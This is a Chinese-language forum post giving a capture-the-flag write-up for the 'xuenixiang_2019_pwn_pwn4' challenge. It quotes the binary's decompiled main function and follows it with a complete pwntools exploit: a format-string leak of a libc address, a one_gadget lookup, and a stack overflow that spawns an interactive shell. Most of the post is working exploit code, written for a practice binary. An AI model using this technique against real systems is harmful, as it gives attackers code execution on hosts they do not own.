xuenixiang_2019_pwn_pwn4 wp by kone
思路:1.通过字符串格式化漏洞,泄漏__libc_start_main地址2.根据__libc_start_main地址获取libc版本
3.获取one gadget地址
4.栈溢出修改返回地址为one gadget地址
exp:
#-*- coding:utf-8 -*-
"""
// xuenixiang_2019_pwn_pwn4: https://www.xuenixiang.com/ctfexercise-competition-293.html
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // BYREF
setvbuf(_bss_start, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
memset(s, 0, sizeof(s));
puts(&::s); // 人类的本质是什么?
read(0, s, 8uLL);
printf(s);
puts(s);
puts(s);
puts(s);
puts(&byte_400978); // 一位群友打烂了复读机!
sleep(1u);
puts(asc_400998); // 人类还有什么本质?
read(0, s, 0x40uLL);
if ( !strstr(s, &needle) || !strstr(s, &byte_4009BA) )
{
puts(&byte_4009C8); // 你并没有理解人类的本质,再见!
exit(0);
}
puts(&byte_4009F8);
return 0;
}
"""
from pwn import *
from LibcSearcher import *
import sys
context(log_level="debug")
if len(sys.argv) == 2:
p = process(sys.argv)
elif len(sys.argv) == 3:
p = remote(sys.argv, sys.argv)
else:
print("Usage: exp.py [./a.out | 1.1.1.1 23456]")
exit(1)
payload1 = "%11$p"
p.sendlineafter("人类的本质是什么?\n", payload1)
p.recvline()
libc_start_main_addr = int(p.recv(14), 16) - 231
print(hex(libc_start_main_addr))
libc = LibcSearcher("__libc_start_main", libc_start_main_addr)
# libc.add_condition('system', 0x03bc00)
libc_base = libc_start_main_addr - libc.dump("__libc_start_main")
print(libc_base)
p.recvuntil("人类还有什么本质?\n")
# libc6_2.27-3ubuntu1_amd64
# 0x4f2c5, 0x4f322, 0x10a38c
one_gadget = 0x4f322
one_addr = libc_base + one_gadget
prefix = "鸽子真香"
payload2 = prefix.ljust(0x28, 'A') + p64(one_addr)
p.send(payload2)
p.interactive()
不错
页:
[1]